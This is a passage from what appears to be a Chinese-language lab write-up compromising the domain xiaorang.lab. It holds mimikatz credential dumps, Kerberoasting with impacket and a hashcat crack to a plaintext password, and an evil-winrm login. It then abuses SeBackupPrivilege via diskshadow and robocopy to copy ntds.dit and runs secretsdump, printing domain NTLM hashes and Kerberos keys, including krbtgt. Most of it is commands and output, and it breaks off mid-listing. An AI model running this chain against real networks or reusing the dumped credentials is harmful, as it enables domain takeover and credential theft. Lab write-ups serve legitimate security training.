         * Password : a0 4c d2 e8 1e 41 4e 89 5e 85 f9 b8 01 6d 9d 42 5c a2 bd cb 9b 71 59 91 c1 e1 95 97 80 65 87 08 eb 93 73 ca 44 b1 45 60 e8 0c bb 75 20 56 47 41 80 04 e5 5b e6 5e 48 e1 63 ed 94 3e 2f c8 16 bf 27 b2 9f ff bd 99 ed 76 69 92 5b bb 33 83 cb 67 7b e0 96 b8 90 3b 94 3a 78 1b 96 a8 bf 0c 0d 83 11 ea dc 60 20 f0 11 dd 70 1a 6a 76 58 e3 c7 d6 72 c9 0b 34 4c 78 49 ab a2 d0 d6 ea ba 4b 2d c6 c7 a7 4f 41 1c 13 66 f8 bb cf 55 e7 cc 49 37 ac 03 88 61 6a 13 d0 0c ed 1e da b6 a0 35 96 36 2c 5c 4c d0 0f 82 8f 47 f0 19 e0 84 cf fd b3 62 da a7 39 64 6a f9 50 45 c0 fe ec f5 76 aa a6 3f ea ba 24 93 e0 2a da 9f b1 6e 95 6a 1f 71 bc b0 cc 77 77 4d 40 a5 77 c7 74 c1 43 50 13 65 ca be 8e e0 0f 18 12 87 89 ae df c9 13 40 d0 e8 93 d2 da
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 786250 (00000000:000bff4a)
Session           : RemoteInteractive from 2
User Name         : zhangshuai
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2023/10/7 0:03:46
SID               : S-1-5-21-754105099-1176710061-2177073800-1001
        msv :
         [00000003] Primary
         * Username : zhangshuai
         * Domain   : XR-0923
         * NTLM     : f97d5a4b44b11bc257a63c3f76f18a9a
         * SHA1     : f6ff2714d556240436758527e190e329f05cd43d
        tspkg :
        wdigest :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 746470 (00000000:000b63e6)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/7 0:03:46
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 8519c5a89b2cd4d679a5a36f26863e5d
         * SHA1     : 42d8188bc30ff0880b838e368c6e5522b86f978d
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : &H!vqg]om0Iz5Pn1NUGod&R9o /!$EK.?jn06+[J*6oZ\A+H?c2;V\(AgGpKw*f0W\vdUf;QoJ/5#DRZDwR@W5U9Io8`;zE7L":Ay-SKpe#>5S?;IL'HarDD
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 745402 (00000000:000b5fba)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/7 0:03:46
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 49a5b95bdddf51629d4cf61b76164d06
         * SHA1     : 21babf0ec24e0b85ceb691ce894bd4d76fd3ecf0
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : a0 4c d2 e8 1e 41 4e 89 5e 85 f9 b8 01 6d 9d 42 5c a2 bd cb 9b 71 59 91 c1 e1 95 97 80 65 87 08 eb 93 73 ca 44 b1 45 60 e8 0c bb 75 20 56 47 41 80 04 e5 5b e6 5e 48 e1 63 ed 94 3e 2f c8 16 bf 27 b2 9f ff bd 99 ed 76 69 92 5b bb 33 83 cb 67 7b e0 96 b8 90 3b 94 3a 78 1b 96 a8 bf 0c 0d 83 11 ea dc 60 20 f0 11 dd 70 1a 6a 76 58 e3 c7 d6 72 c9 0b 34 4c 78 49 ab a2 d0 d6 ea ba 4b 2d c6 c7 a7 4f 41 1c 13 66 f8 bb cf 55 e7 cc 49 37 ac 03 88 61 6a 13 d0 0c ed 1e da b6 a0 35 96 36 2c 5c 4c d0 0f 82 8f 47 f0 19 e0 84 cf fd b3 62 da a7 39 64 6a f9 50 45 c0 fe ec f5 76 aa a6 3f ea ba 24 93 e0 2a da 9f b1 6e 95 6a 1f 71 bc b0 cc 77 77 4d 40 a5 77 c7 74 c1 43 50 13 65 ca be 8e e0 0f 18 12 87 89 ae df c9 13 40 d0 e8 93 d2 da
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/10/6 23:59:13
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/10/6 23:59:10
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 64520 (00000000:0000fc08)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/6 23:59:10
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 8519c5a89b2cd4d679a5a36f26863e5d
         * SHA1     : 42d8188bc30ff0880b838e368c6e5522b86f978d
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : &H!vqg]om0Iz5Pn1NUGod&R9o /!$EK.?jn06+[J*6oZ\A+H?c2;V\(AgGpKw*f0W\vdUf;QoJ/5#DRZDwR@W5U9Io8`;zE7L":Ay-SKpe#>5S?;IL'HarDD
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 64501 (00000000:0000fbf5)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/6 23:59:10
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 49a5b95bdddf51629d4cf61b76164d06
         * SHA1     : 21babf0ec24e0b85ceb691ce894bd4d76fd3ecf0
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : a0 4c d2 e8 1e 41 4e 89 5e 85 f9 b8 01 6d 9d 42 5c a2 bd cb 9b 71 59 91 c1 e1 95 97 80 65 87 08 eb 93 73 ca 44 b1 45 60 e8 0c bb 75 20 56 47 41 80 04 e5 5b e6 5e 48 e1 63 ed 94 3e 2f c8 16 bf 27 b2 9f ff bd 99 ed 76 69 92 5b bb 33 83 cb 67 7b e0 96 b8 90 3b 94 3a 78 1b 96 a8 bf 0c 0d 83 11 ea dc 60 20 f0 11 dd 70 1a 6a 76 58 e3 c7 d6 72 c9 0b 34 4c 78 49 ab a2 d0 d6 ea ba 4b 2d c6 c7 a7 4f 41 1c 13 66 f8 bb cf 55 e7 cc 49 37 ac 03 88 61 6a 13 d0 0c ed 1e da b6 a0 35 96 36 2c 5c 4c d0 0f 82 8f 47 f0 19 e0 84 cf fd b3 62 da a7 39 64 6a f9 50 45 c0 fe ec f5 76 aa a6 3f ea ba 24 93 e0 2a da 9f b1 6e 95 6a 1f 71 bc b0 cc 77 77 4d 40 a5 77 c7 74 c1 43 50 13 65 ca be 8e e0 0f 18 12 87 89 ae df c9 13 40 d0 e8 93 d2 da
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 33775 (00000000:000083ef)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2023/10/6 23:59:10
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 49a5b95bdddf51629d4cf61b76164d06
         * SHA1     : 21babf0ec24e0b85ceb691ce894bd4d76fd3ecf0
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : a0 4c d2 e8 1e 41 4e 89 5e 85 f9 b8 01 6d 9d 42 5c a2 bd cb 9b 71 59 91 c1 e1 95 97 80 65 87 08 eb 93 73 ca 44 b1 45 60 e8 0c bb 75 20 56 47 41 80 04 e5 5b e6 5e 48 e1 63 ed 94 3e 2f c8 16 bf 27 b2 9f ff bd 99 ed 76 69 92 5b bb 33 83 cb 67 7b e0 96 b8 90 3b 94 3a 78 1b 96 a8 bf 0c 0d 83 11 ea dc 60 20 f0 11 dd 70 1a 6a 76 58 e3 c7 d6 72 c9 0b 34 4c 78 49 ab a2 d0 d6 ea ba 4b 2d c6 c7 a7 4f 41 1c 13 66 f8 bb cf 55 e7 cc 49 37 ac 03 88 61 6a 13 d0 0c ed 1e da b6 a0 35 96 36 2c 5c 4c d0 0f 82 8f 47 f0 19 e0 84 cf fd b3 62 da a7 39 64 6a f9 50 45 c0 fe ec f5 76 aa a6 3f ea ba 24 93 e0 2a da 9f b1 6e 95 6a 1f 71 bc b0 cc 77 77 4d 40 a5 77 c7 74 c1 43 50 13 65 ca be 8e e0 0f 18 12 87 89 ae df c9 13 40 d0 e8 93 d2 da
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 33721 (00000000:000083b9)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2023/10/6 23:59:10
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 49a5b95bdddf51629d4cf61b76164d06
         * SHA1     : 21babf0ec24e0b85ceb691ce894bd4d76fd3ecf0
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : a0 4c d2 e8 1e 41 4e 89 5e 85 f9 b8 01 6d 9d 42 5c a2 bd cb 9b 71 59 91 c1 e1 95 97 80 65 87 08 eb 93 73 ca 44 b1 45 60 e8 0c bb 75 20 56 47 41 80 04 e5 5b e6 5e 48 e1 63 ed 94 3e 2f c8 16 bf 27 b2 9f ff bd 99 ed 76 69 92 5b bb 33 83 cb 67 7b e0 96 b8 90 3b 94 3a 78 1b 96 a8 bf 0c 0d 83 11 ea dc 60 20 f0 11 dd 70 1a 6a 76 58 e3 c7 d6 72 c9 0b 34 4c 78 49 ab a2 d0 d6 ea ba 4b 2d c6 c7 a7 4f 41 1c 13 66 f8 bb cf 55 e7 cc 49 37 ac 03 88 61 6a 13 d0 0c ed 1e da b6 a0 35 96 36 2c 5c 4c d0 0f 82 8f 47 f0 19 e0 84 cf fd b3 62 da a7 39 64 6a f9 50 45 c0 fe ec f5 76 aa a6 3f ea ba 24 93 e0 2a da 9f b1 6e 95 6a 1f 71 bc b0 cc 77 77 4d 40 a5 77 c7 74 c1 43 50 13 65 ca be 8e e0 0f 18 12 87 89 ae df c9 13 40 d0 e8 93 d2 da
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 32607 (00000000:00007f5f)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2023/10/6 23:59:09
SID               :
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 49a5b95bdddf51629d4cf61b76164d06
         * SHA1     : 21babf0ec24e0b85ceb691ce894bd4d76fd3ecf0
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : XR-0923$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/10/6 23:59:09
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xr-0923$
         * Domain   : XIAORANG.LAB
         * Password : a0 4c d2 e8 1e 41 4e 89 5e 85 f9 b8 01 6d 9d 42 5c a2 bd cb 9b 71 59 91 c1 e1 95 97 80 65 87 08 eb 93 73 ca 44 b1 45 60 e8 0c bb 75 20 56 47 41 80 04 e5 5b e6 5e 48 e1 63 ed 94 3e 2f c8 16 bf 27 b2 9f ff bd 99 ed 76 69 92 5b bb 33 83 cb 67 7b e0 96 b8 90 3b 94 3a 78 1b 96 a8 bf 0c 0d 83 11 ea dc 60 20 f0 11 dd 70 1a 6a 76 58 e3 c7 d6 72 c9 0b 34 4c 78 49 ab a2 d0 d6 ea ba 4b 2d c6 c7 a7 4f 41 1c 13 66 f8 bb cf 55 e7 cc 49 37 ac 03 88 61 6a 13 d0 0c ed 1e da b6 a0 35 96 36 2c 5c 4c d0 0f 82 8f 47 f0 19 e0 84 cf fd b3 62 da a7 39 64 6a f9 50 45 c0 fe ec f5 76 aa a6 3f ea ba 24 93 e0 2a da 9f b1 6e 95 6a 1f 71 bc b0 cc 77 77 4d 40 a5 77 c7 74 c1 43 50 13 65 ca be 8e e0 0f 18 12 87 89 ae df c9 13 40 d0 e8 93 d2 da
        ssp :
        credman :
        cloudap :

拿着 XR-0923$ 机器账户的凭据去收集信息

kerberoasting

proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':49a5b95bdddf51629d4cf61b76164d06' -dc-ip 172.22.14.11

image-20231007003105494

request

proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':49a5b95bdddf51629d4cf61b76164d06' -dc-ip 172.22.14.11 -request-user tianjing

image-20231007003833039

$krb5tgs$23$*tianjing$XIAORANG.LAB$xiaorang.lab/tianjing*$009eacf0222bb2671ca1415c58370337$9794f87dcc86e14854d505ee5d65b5bbdd353faa69ca1a220bc68624b1deb9bf9ad75d6e85c3be1f34dc958fe92da5048d352366ba9bb6a72cc01c50d8642946e48c76266225df02d4ef072c18e322350a652abbb8ce3f9dc4191873a4c23f0c883e304733f0e88e37561506d34e5c2b972e06412ff6f67ee45364aa7449b530bb46d79cf06d755a37041b1b884d73a4db374854cc19cd4e16ed506304ce9494d82b95d03397c6e8e301f383f00c29781ebe5c6938c9fa13e9b4717a1c3781621d3a139a677dac000998d47ce6999d7d19745df69f94f358d3013a77f7bced1aad0d47c938508c4971f88d12195ef7b43d7e8c516a75f23718cc54b52a5c8667aa482d9510945eae99615b141bd5563a4dda55fe78eb3aa1844e580a6120bfb14bdbfd087ca1aed9e07285af6220cc0ed6bf1ef07470ea2174deb99ef941a2bb0ba423a3bb267017475c4a634500f5582ca2fddd6dab43feafef816a1e8d2624d91469e195b63d4d4d1bd496dd33eacd44c9bb59d18d86533e24a51c95b67b4b3bde6b018f877ed4ae9c0dde21ced57b0d93024261324199622e23ec76bf21df9f6ae748e1bf95db3837e63a4f806fb42791f976abcd69691d47919564c7ef5036ff0b3ba3e27e4b438e7df95e7067266f2c5df99002a83749723ba918c17b469944b88224f3dcbd391c122f47960610302caaa31797d69016d214f0260f2ff0fe59b4b82ca1fc259e2f33c922661891a2136e93f05a63d059db81b9186008066b0b26153146d2717d95b31ed3b90c81fd0001171a0b64e9f4c663240522f2acde8a0b3b51f9983fcb39dee5c9d0b0c8e7d47e15f7664ed9ba6b503d0cd06f84a1aa9b32cf21f804da0476011fbddc568a9cc307dcd5a43c6e5fcbaf50e93b9dbdf71798f0dca52e4609cd516237656ae1a11ecdb095443c821d9a9c762673fb48b01105852cbfbef93b355d8fdcad5ecf3e1a06d1a213ddffef5f977a1908483530cf14d1ae8ffb5f23399b943c50aefe37ca44a6cf286c58fc2bdc05253050e3cbeb815d71d29a6976ca8d9b287921401563ad4bff5d08582a047f80af73cea909d6f2ba330c88981643b12741cb20f2ce38ca5c3d758feec45a112c5b4952337afaf416a669872e1a31a220c7958eb91226ef6d89dcf66f54ed35e197cdbd05b05f8f84823cc678fcb1c78ecfccd50b9f2e6bfd02baff23ae71e821ffe87ae199dc2aae3b2b845058487904bc420f38ba4ad410c52ed5a88a56f0bc9311ce4ebc989e6bece9de0afa1e9a253ce6c69b74c465d4c92dd68924f430549897570fa9ea2d1d3da43101361721acc1b68adfa0ad0c7f6b5685fb34f25ed46a3c65dd858929fc4296286398ef0a76cab833d31469dfd457395952ae859e45d551d89c387f75dca52083dc232e5b109785889e55310fd9be5570b8233cc8fadf6bcf8cbca6cb2529d26092b4c3c07af14459a94d21bde3
hashcat -a 0 -m 13100 hash.txt rockyou.txt

爆破出来

DPQSXSXgh2

crackmapexec winrm连接一下

proxychains evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 
whoami /priv

image-20231007004500749

有 SeBackupPrivilege 和 SeRestorePrivilege 特权

导出 sam system

reg save HKLM\SYSTEM system

在本地新建一个raj.dsh文件,放以下内容:

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

再用unix2dos将dsh文件的编码间距转换为Windows兼容的编码和间距

unix2dos raj.dsh

将rah.dsh上传到靶机里,这里传到了C:/temp目录下,该目录需要mkdir新建 接着用diskshadow执行raj.dsh中的命令

upload raj.dsh
diskshadow /s raj.dsh

image-20231007005103757

再用RoboCopy工具将文件从z盘复制到临时目录

RoboCopy /b z:\windows\ntds . ntds.dit

image-20231007005213405

下载下来

download C:/temp/ntds.dit privilege/ntds.dit
download C:/temp/system privilege/system

提取hash

impacket-secretsdump -ntds ntds.dit -system system local
└─# impacket-secretsdump -ntds ntds.dit -system system local
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x4d1852164a0b068f32110659820cd4bc
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 8cca939cb8a94a304d33209b41a99517
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:70c39b547b7d8adec35ad7c09fb1d277:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
XR-DC$:1000:aad3b435b51404eeaad3b435b51404ee:28b508bccbc765e1779134fc309ee161:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4b2afb57dd0833ee9ed732ea89c263a3:::
XR-0923$:1103:aad3b435b51404eeaad3b435b51404ee:8519c5a89b2cd4d679a5a36f26863e5d:::
tianjing:1104:aad3b435b51404eeaad3b435b51404ee:c8252441ad9f475d629865fe86b3aecd:::
liyuying:1106:aad3b435b51404eeaad3b435b51404ee:4e77dc688f87c4ebbbe1da95931d25d1:::
wangyuying:1107:aad3b435b51404eeaad3b435b51404ee:f09d261da7841e97bc25e5a95833ee4a:::
yangguiying:1108:aad3b435b51404eeaad3b435b51404ee:93242254318fe496c9d03908c0ab7440:::
zhoumin:1109:aad3b435b51404eeaad3b435b51404ee:fad94b7c69cdbc4376fb17dc78cc858e:::
chenyun:1110:aad3b435b51404eeaad3b435b51404ee:8e41a10b056df5d0c53e8140d4790b21:::
chenmei:1111:aad3b435b51404eeaad3b435b51404ee:d53b17e5763bb9f028211044a32a9267:::
huangmin:1112:aad3b435b51404eeaad3b435b51404ee:9c75fa751d66813d7ed4caa6d2d9af38:::
jiangcheng:1113:aad3b435b51404eeaad3b435b51404ee:9c75fa751d66813d7ed4caa6d2d9af38:::
huanggang:1114:aad3b435b51404eeaad3b435b51404ee:9c75fa751d66813d7ed4caa6d2d9af38:::
machao:1115:aad3b435b51404eeaad3b435b51404ee:9a504875c8fc24ea22c3a27152ed3273:::
liguihua:1119:aad3b435b51404eeaad3b435b51404ee:88c540dbe639451a04a5183ea0e0af0d:::
wangfang:1120:aad3b435b51404eeaad3b435b51404ee:0bf4fdbc625a4435868eb71dbc8307b3:::
liguizhi:1122:aad3b435b51404eeaad3b435b51404ee:51c00743fa6f148926694c830112ae33:::
wangyulan:1123:aad3b435b51404eeaad3b435b51404ee:9b57eb71d89ba4003558cc451c3393ef:::
huachunmei:1126:aad3b435b51404eeaad3b435b51404ee:75fa801c8a5bedcb2b81c4f792ce1024:::
jiadongmei:1127:aad3b435b51404eeaad3b435b51404ee:6ac97d0534c99743bfa52ed5584e916b:::
liguilan:1128:aad3b435b51404eeaad3b435b51404ee:c337e57ca73c99e1eb1da443425da58b:::
yuxuecheng:1129:aad3b435b51404eeaad3b435b51404ee:cfc4835a206d618f1d7ea2bc22cc49ac:::
lixiuying:1130:aad3b435b51404eeaad3b435b51404ee:2e73b44dce942ffe682bb3b4052caa95:::
liguizhen:1134:aad3b435b51404eeaad3b435b51404ee:63d1d7be0b04f6b5b5336434a3d5a518:::
chenjianhua:1135:aad3b435b51404eeaad3b435b51404ee:5e121c3d4d259f35917c9c666c7c3650:::
yangjuan:1138:aad3b435b51404eeaad3b435b51404ee:68868390d1183fb671a371e0929b8a54:::
lidan:1139:aad3b435b51404eeaad3b435b51404ee:4dea8e760936a0d96f906edc4a470add:::
liyang:1140:aad3b435b51404eeaad3b435b51404ee:428aa70becfc16307febab419ecb313c:::
zhaojun:1141:aad3b435b51404eeaad3b435b51404ee:2f8101fa58b9337891ec96ce56b8b2f7:::
chenxin:1145:aad3b435b51404eeaad3b435b51404ee:e0eca1319b608886bc2102ba569a13f6:::
chenfei:1146:aad3b435b51404eeaad3b435b51404ee:dc1d2b7d3939d0002ba8292d1e1b20a4:::
chenhao:1148:aad3b435b51404eeaad3b435b51404ee:1145c8ce1774e134341b1f243eaca68b:::
lifei:1149:aad3b435b51404eeaad3b435b51404ee:3e08a9626cd85505b46166ae57e38ca1:::
zhangfang:1150:aad3b435b51404eeaad3b435b51404ee:010505bc625ab34f2b4e497861c51f13:::
zhangkun:1151:aad3b435b51404eeaad3b435b51404ee:814c056b97ff9cf9bbe4922c4ca32881:::
yanglei:1155:aad3b435b51404eeaad3b435b51404ee:055fd770c62e1b9582c1aeebcb04fc71:::
chenxia:1157:aad3b435b51404eeaad3b435b51404ee:c52d91b91f859c850087fa74e14a9069:::
zhangkai:1160:aad3b435b51404eeaad3b435b51404ee:40fee6e974e30258042a6b845acf41f4:::
liuyu:1161:aad3b435b51404eeaad3b435b51404ee:bafadbab49757fda93da68c7f9f787a7:::
chenming:1163:aad3b435b51404eeaad3b435b51404ee:75f769ecda05fbf6a6848f8398e9b120:::
mali:1164:aad3b435b51404eeaad3b435b51404ee:8a5e14c2a4876105e7c1370d36cfc7a1:::
chengang:1169:aad3b435b51404eeaad3b435b51404ee:8bd93219f6d7921e241415c508473482:::
huangwei:1171:aad3b435b51404eeaad3b435b51404ee:5b681f8a5961a08ad983c05ea976a65e:::
lixia:1174:aad3b435b51404eeaad3b435b51404ee:5fc366da322ac7c3098ab20bb56ffe11:::
xujing:1175:aad3b435b51404eeaad3b435b51404ee:3df64977422013367c25f57cd9d3b2c3:::
zhangjuan:1178:aad3b435b51404eeaad3b435b51404ee:dba8c7706c9c2fea332afe2b8e8a1bba:::
chenhui:1179:aad3b435b51404eeaad3b435b51404ee:78f95a95a9304cf06f1b0a733ac8eee7:::
liying:1181:aad3b435b51404eeaad3b435b51404ee:d3e572a3aa71a4cefe7a8ad65dc4e1ec:::
zhaoli:1182:aad3b435b51404eeaad3b435b51404ee:561b71d50c2614d91e6031a1e44ba3fe:::
zhoujing:1184:aad3b435b51404eeaad3b435b51404ee:1fefe6706ec68bb805361ce5a9944fbc:::
zhaoyong:1189:aad3b435b51404eeaad3b435b51404ee:27bd4f7d5403828b5ed310729119693a:::
wangyu:1192:aad3b435b51404eeaad3b435b51404ee:f1476afff3d4e3e4c97a0e18a88a651f:::
yangli:1193:aad3b435b51404eeaad3b435b51404ee:5d01864d2dc0eca800b7faf6aac91b38:::
yangliu:1196:aad3b435b51404eeaad3b435b51404ee:101fdcd11cd305f78495a8bcd31b02d9:::
wangying:1197:aad3b435b51404eeaad3b435b51404ee:0a8fbc5b333c1a52b4b8089fee9c274a:::
chenjie:1198:aad3b435b51404eeaad3b435b51404ee:fe343db5062c94af05a2c5b2bcfbf8ad:::
yangyong:1199:aad3b435b51404eeaad3b435b51404ee:e03de581dc8e75885672faa7e9f4d498:::
lixin:1201:aad3b435b51404eeaad3b435b51404ee:dd559fcf4523947742dbdc72f9e52e6b:::
zhanghui:1205:aad3b435b51404eeaad3b435b51404ee:ea31fe5bfe9fcbb74613ce13ac81225f:::
chenlin:1208:aad3b435b51404eeaad3b435b51404ee:b8cd9155c7c4e3f2fe535272566420cf:::
chenjuan:1209:aad3b435b51404eeaad3b435b51404ee:38f7a5a37bca7d68b17ad2eb922b44f3:::
chenchen:1215:aad3b435b51404eeaad3b435b51404ee:9e7295616a8faf501b5526f0eaeb5b0c:::
wangbing:1216:aad3b435b51404eeaad3b435b51404ee:d12641f47f63cb00cb5686ab0baa7113:::
chenling:1219:aad3b435b51404eeaad3b435b51404ee:f322cbf95eba279337538777e454abf1:::
yangmei:1220:aad3b435b51404eeaad3b435b51404ee:b50dd4e0fe64b40d91c33a97d4c66784:::
tiangui:1226:aad3b435b51404eeaad3b435b51404ee:8b30503a779d10de17744bb56ee15b8c:::
tianwen:1227:aad3b435b51404eeaad3b435b51404ee:667454046d29e985b63a7931f4b9219d:::
tianshengli:1228:aad3b435b51404eeaad3b435b51404ee:df0febe8871e463155401c3d896244fc:::
tianshi:1229:aad3b435b51404eeaad3b435b51404ee:63d1d7be0b04f6b5b5336434a3d5a518:::
tianlong:1230:aad3b435b51404eeaad3b435b51404ee:5e121c3d4d259f35917c9c666c7c3650:::
[*] Kerberos keys from ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:afdaee99d584caec50bfce43fb4f524e80017d7d04fdd435849a9e8a037ba399
Administrator:aes128-cts-hmac-sha1-96:17cf30f985414dfc95092429bf74fac7
Administrator:des-cbc-md5:79a1466708cd6838
XR-DC$:aes256-cts-hmac-sha1-96:d0ad72242e3427e019423ffaf2c5e0ef8b3c24d7d19dfa168e2b6b6a183bb329
XR-DC$:aes128-cts-hmac-sha1-96:52cfe45e1f3a6b3e10733e8685dd04f5
XR-DC$:des-cbc-md5:ec86a2ba0246e36b
krbtgt:aes256-cts-hmac-sha1-96:b2f2e630f3c12c2cc2779624a11a1406c792c8f31d145246e657b230ff9f0f09
krbtgt:aes128-cts-hmac-sha1-96:5f2c868accc1f40c80fdf7094494faf4
krbtgt:des-cbc-md5:673b2937e3cd7cab
XR-0923$:aes256-cts-hmac-sha1-96:02441b847ba66594021166a9df5b18ede009ddc78da3727e0a0ca7f6b398d603
XR-0923$:aes128-cts-hmac-sha1-96:d865e85f9bb8373356e869737257af3b
XR-0923$:des-cbc-md5:0e1c435245ea6838
tianjing:aes256-cts-hmac-sha1-96:0d2a06ad0f07f0571bb99c1fae170bde9dbb57b8c364a0f5c75370dde8b449af
tianjing:aes128-cts-hmac-sha1-96:e936ddfdaab20e8445c2e182e14cd422
tianjing:des-cbc-md5:15bf5d5de52a6be3
liyuying:aes256-cts-hmac-sha1-96:488901e33ba91b2b58d927797a5ec7f8bede179e6f3b7fba62aac4b9936427c9
liyuying:aes128-cts-hmac-sha1-96:5cbb47c3d5766dc4d33c613ab6f9a45f
liyuying:des-cbc-md5:027504a7a820ba07
wangyuying:aes256-cts-hmac-sha1-96:ed3bd47fce79ad0170f48646647764054b670720e4ad31328e5f50dc191aef2d
wangyuying:aes128-cts-hmac-sha1-96:0d66d8bfb7de1aaad057270b923edf46
wangyuying:des-cbc-md5:79918564ab61fe43
yangguiying:aes256-cts-hmac-sha1-96:8b06648fe9d6e47d8df4c4a3407b9bca7d7ae8b7a355d35788e483e24b5d5329
yangguiying:aes128-cts-hmac-sha1-96:65e2c07527272134938a1754e6a47740
yangguiying:des-cbc-md5:d532798061dad50d
zhoumin:aes256-cts-hmac-sha1-96:46fab8083c4f48489b21b5da3e2fc922ef1f66cfbbc78829b2fc477e4723783d
zhoumin:aes128-cts-hmac-sha1-96:1bff68920b27915b3f1e917ad981f854
zhoumin:des-cbc-md5:9dd67c40eff13de3
chenyun:aes256-cts-hmac-sha1-96:a56040ca8fb3770f172e4d17598afe76c45e5c400bfe8be77aba7b47655fd441
chenyun:aes128-cts-hmac-sha1-96:b74c17427ac4f3a8825eb0e1c861f59c
chenyun:des-cbc-md5:706e205864a1fe64
chenmei:aes256-cts-hmac-sha1-96:4cd6ffc87bbfccc5310e03680e5bafabca1cb658dececb87642e13dcbd1a7bb1
chenmei:aes128-cts-hmac-sha1-96:6afadb7a5f030a0181e340d94cb2a76a
chenmei:des-cbc-md5:70fbabc40b7a29ef
huangmin:aes256-cts-hmac-sha1-96:3fbff1b76fbe10a02085ff0a7bbd3e7c0e153078a8afe1895b0e10d342f33a28
huangmin:aes128-cts-hmac-sha1-96:2cfb104d7aaa245c6730fa57f38899f0
huangmin:des-cbc-md5:970df24ce354fe01
jiangcheng:aes256-cts-hmac-sha1-96:b10c07048384977f2470005b67dfa9d5e7a17de0fb04d53b49a3e0fb413d0215
jiangcheng:aes128-cts-hmac-sha1-96:663b9662442e3c99eb4c71f50c83bbf1
jiangcheng:des-cbc-md5:730e89e3c2835d2a
huanggang:aes256-cts-hmac-sha1-96:9976b9d8467cadf35251c9c95d860455ebf9297ba518e7fc6794861e9d28d99c
